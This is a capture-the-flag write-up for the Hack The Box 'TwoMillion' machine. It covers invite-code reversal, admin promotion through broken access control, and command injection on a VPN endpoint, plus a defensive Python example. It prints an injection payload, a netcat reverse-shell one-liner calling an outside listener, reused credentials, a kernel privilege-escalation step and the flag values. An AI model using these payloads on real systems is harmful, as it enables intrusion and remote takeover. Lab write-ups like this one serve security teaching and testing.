
Hack The Box

TwoMillion

Tags: HTB, Easy, Linux, Web, API, RCE

Summary

TwoMillion is an Easy Linux machine based on the old HTB invite flow. The client-side invite logic is reversed to register an account, then a Broken Access Control flaw on /api/v1/admin/settings/update promotes the account to admin. An admin-only VPN endpoint is vulnerable to command injection, yielding a shell as www-data. Credentials in a .env file allow SSH as admin, and the CVE-2023-0386 OverlayFS/FUSE kernel bug escalates to root.

Machine Information

Name       | Difficulty | OS    | Platform
TwoMillion | Easy       | Linux | Hack The Box

Attack Path

  1. Web application on port 80 with exposed /api/v1/ endpoints.
  2. Reverse the client-side invite-code logic to register.
  3. Broken Access Control promotes the account to admin.
  4. Command injection on the admin VPN endpoint gives a shell.
  5. Credentials exposed in a .env file allow SSH as admin.
  6. Privilege escalation via CVE-2023-0386.

Reconnaissance

Initial enumeration was performed with Nmap.

nmap -sC -sV -A -T4 10.129.27.255

[Screenshot: Nmap scan]

Port | Service | Notes
22   | SSH     | OpenSSH 8.9p1 Ubuntu
80   | HTTP    | nginx, app at 2million.htb

Web Enumeration

The site used an invite-based registration flow. The /invite route loaded an obfuscated JavaScript file (inviteapi.min.js) containing a makeInviteCode() function. Deobfuscating it revealed the invite API logic.

Deobfuscation

/api/v1/invite/how/to/generate

The endpoint returned an encoded message; after ROT13 and Base64 decoding it pointed to the code used to register an account.

[Screenshot: Decoded invite]

Exploitation — Broken Access Control

After registering and logging in, manual enumeration revealed administrative endpoints under /api/v1/admin.

[Screenshot: API structure leak]

The /api/v1/admin/settings/update endpoint allowed changing account properties, including the admin flag, without proper authorization. Sending the correct JSON body promoted the account to admin.

[Screenshot: Set admin]

This is a classic Broken Access Control flaw.

Command Injection

With admin privileges, the /api/v1/admin/vpn/generate endpoint was reachable and vulnerable to command injection.

ninjaa;id;

[Screenshot: Command injection]

uid=33(www-data) gid=33(www-data) groups=33(www-data)

A reverse shell payload was injected:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.233 1337 >/tmp/f
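As an added defender-side example (not code from the original writeup or from the HTB machine), the following shows the pattern behind this finding, its hardened counterpart, and a small detector run over constructed request records. The script path /opt/scripts/gen_vpn.sh and the shape of the request log are assumptions.

```python
import re

# Strict allowlist for the VPN profile name: letters, digits, dot, dash,
# underscore, at most 32 characters. ';', '|', '$', backticks, spaces and
# newlines are all rejected before anything reaches the operating system.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")
SHELL_META = re.compile(r"[;|&$`<>\n\\'\"(){}]")

# Constructed sample of admin API requests as an application might log them
# (assumption: JSON bodies of admin calls are logged; not the real log format).
SAMPLE_REQUESTS = [
    {"path": "/api/v1/admin/vpn/generate", "body": {"username": "alice"}},
    {"path": "/api/v1/admin/vpn/generate", "body": {"username": "ninjaa;id;"}},
    {"path": "/api/v1/admin/settings/update", "body": {"email": "alice@2million.htb"}},
]


def vulnerable_command(username: str) -> str:
    """The pattern behind the finding: user input spliced into a shell string.
    Returned rather than executed, so the effect of 'ninjaa;id;' is visible:
    the shell would run the script, then 'id', as separate commands."""
    return f"/bin/bash /opt/scripts/gen_vpn.sh {username}"  # hypothetical script path


def hardened_command(username: str) -> list:
    """Hardened form: validate against the allowlist, then build an argv list
    for subprocess.run(argv, shell=False) so no shell ever parses the input."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError(f"rejected VPN username: {username!r}")
    return ["/bin/bash", "/opt/scripts/gen_vpn.sh", username]


def flag_injection_attempts(requests: list) -> list:
    """Detection: return vpn/generate requests whose username carries shell
    metacharacters, which is what the 'ninjaa;id;' probe above looks like."""
    hits = []
    for r in requests:
        if r.get("path") != "/api/v1/admin/vpn/generate":
            continue
        name = str(r.get("body", {}).get("username", ""))
        if SHELL_META.search(name):
            hits.append(r)
    return hits
```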

Initial Access

A listener received the shell as www-data.

nc -nlvp 1337

[Screenshot: Reverse shell]

Local enumeration found a .env file with database credentials:

cat .env

[Screenshot: .env file]

DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123

These were reused to authenticate over SSH as admin:

ssh admin@2million.htb

Privilege Escalation

Enumeration

A mail in admin's mailbox referenced upcoming kernel patches for an OverlayFS/FUSE vulnerability.

cat /var/mail/admin

[Screenshot: Admin mail]

This pointed directly at CVE-2023-0386.

Exploiting CVE-2023-0386

The exploit was transferred to the target and run, producing a root shell.

# attacker
python3 -m http.server 8000

[Screenshot: Privilege escalation]

Flags

User

cat /home/admin/user.txt

[Screenshot: User flag]

5a28a32104c5f20858e360d9c80b0608

Root

cat /root/root.txt

[Screenshot: Root flag]

3d2e9a0f27d1212fd9f2aee37627d7c4

Vulnerabilities Identified

Sensitive Logic Exposed in JavaScript

Impact: unauthenticated account registration.

Broken Access Control

Impact: privilege escalation within the application.

Command Injection

Impact: remote code execution as www-data.

Credential Exposure

Impact: pivot to an interactive system account.

Kernel Vulnerability (CVE-2023-0386)

Impact: full system compromise.

Tools Used

Key Takeaways